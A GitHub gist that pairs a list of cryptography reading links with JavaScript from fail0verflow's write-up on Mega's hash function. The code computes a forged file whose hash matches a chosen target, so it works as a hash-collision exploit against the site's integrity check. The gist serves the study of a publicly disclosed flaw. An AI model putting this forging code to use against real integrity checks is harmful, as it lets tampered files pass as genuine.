- RSA and padding oracle attack with very good examples another
- Cryptographic doom principle
- Static IV is bad
- http://crypto.stackexchange.com/
- http://blog.cryptographyengineering.com/2012/10/the-crypto-dream.html
- http://sourceforge.net/projects/evercrack/
- http://www.snikt.net/blog/2012/12/02/howto-encrypt-harddrive/
- Homographic cryptography
- https://factorable.net/
- Real World Crypto 2013
- https://polarssl.org
- Pond is not email. Pond is forward secure, asynchronous messaging for the discerning gentleman
- Perfect forward secrecy with PGP RFC
- TOR vs i2p
- http://blog.spiderlabs.com/2013/01/defeating-aes-without-a-phd.html
- https://defuse.ca/truecrypt-plausible-deniability-useless-by-game-theory.htm
- https://github.com/ssllabs/research/wiki
- This page contains my godzilla crypto tutorial, totalling 973 slides in 12 parts
- http://www.cs.berkeley.edu/~daw/teaching/cs261-f12/misc/if.html
- https://code.google.com/p/bletchley/source/checkout
- http://www.stat.fsu.edu/pub/diehard/
- http://ekaia.org/blog/2009/05/10/creating-new-gpgkey/
- http://www.cryptovirology.com/
- http://nullprogram.com/blog/2012/06/24/
- http://www.cs.rit.edu/~ib/Classes/CS482-705_Winter10-11/Slides/
- If You're Typing The Letters A-E-S Into Your Code, You're Doing It Wrong
Last active
October 11, 2015 07:47
-
-
Save packz/3825835 to your computer and use it in GitHub Desktop.
CRYPTO
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // http://fail0verflow.com/blog/2013/megafail.html | |
| // Mega's standard hash function | |
| function h(s) | |
| { | |
| var a = [0,0,0,0]; | |
| var aes = new sjcl.cipher.aes([111111,222222,333333,444444]); | |
| s += Array(16).join('X'); | |
| for (var i = s.length&-16; i--; ) | |
| { | |
| a[(i>>2)&3] ^= s.charCodeAt(i)<<((7-i&3)<<3); | |
| if (!(i&15)) a = aes.encrypt(a); | |
| } | |
| return a; | |
| } | |
| // The reverse hash function, used to backtrack across data. | |
| // reverse_h(s, h(s)) == [0,0,0,0] | |
| function reverse_h(s,a) | |
| { | |
| var aes = new sjcl.cipher.aes([111111,222222,333333,444444]); | |
| for (var i = 0; i < s.length; i++) | |
| { | |
| if (!(i&15)) a = aes.decrypt(a); | |
| a[(i>>2)&3] ^= s.charCodeAt(i)<<((7-i&3)<<3); | |
| } | |
| return a; | |
| } | |
| // The hash value that we want to forge | |
| g_hash = [0,0,0,0] | |
| $(document).ready(function(){ | |
| // Just fetches the file from disk and computes the standard Mega hash | |
| $("#file").change(function() { | |
| if (this.files.length > 0) { | |
| var binaryReader = new FileReader(); | |
| binaryReader.onload = function(){ | |
| var blob = binaryReader.result; | |
| g_hash = h(blob); | |
| $("#hash").text("[" + g_hash.join(",") + "]"); | |
| }; | |
| binaryReader.readAsText(this.files[0]); | |
| } | |
| }); | |
| // Computes the forged file | |
| $("#forge").click(function(){ | |
| // Initialize the AES engine | |
| var aes = new sjcl.cipher.aes([111111,222222,333333,444444]); | |
| // Append JS-friendly padding such that the file is a multiple of | |
| // 16 bytes long and ends in "\n/*" (yes, this could be simplified | |
| // by merging the two comments, but whatever). | |
| var head = $("#forgedfile").text() + "\n//XXX"; | |
| head += Array(16).join('X'); | |
| head = head.substr(0, (head.length&-16) - 3); | |
| head += "\n/*" | |
| // Reverse the MAC to compute the intermediate MAC value for the | |
| // head of the file, such that the final MAC value is what we want. | |
| // (the head of the file is the tail of the hash data, since the MAC | |
| // runs backwards). Decrypt it one last time; this decryption | |
| // corresponds to the encryption performed at the end of the collision | |
| // block (see below). | |
| var headhash = aes.decrypt(reverse_h(head, g_hash)); | |
| // Create and MAC normally the last block in the file. This is just | |
| // "*/\n" plus the standard XXXXX padding applied by h() | |
| var tail = "*/\n"; | |
| var tailhash = h(tail); | |
| // Finally, given one intermediate MAC value and what we want the next | |
| // MAC value to be, just XOR them together to find the block that we | |
| // need to insert. | |
| var collision = ""; | |
| for (i = 0; i < 16; i++) { | |
| var xor = headhash[i>>2] ^ tailhash[i>>2]; | |
| collision += String.fromCharCode((xor >> ((3-i&3)<<3)) & 0xff); | |
| } | |
| // Append everything together to form the new file | |
| var data = head + collision + tail; | |
| // Double check that the collision worked | |
| var h2 = h(data); | |
| if ( g_hash[0] == h2[0] && g_hash[1] == h2[1] && | |
| g_hash[2] == h2[2] && g_hash[3] == h2[3]) { | |
| alert("Collision successful, hash value matches!"); | |
| var uri = "data:application/octet-stream," + encodeURIComponent(data); | |
| window.open(uri, 'Your forged file'); | |
| } else { | |
| alert("Collision failed! Got " + h2.join(",")); | |
| }; | |
| }); | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment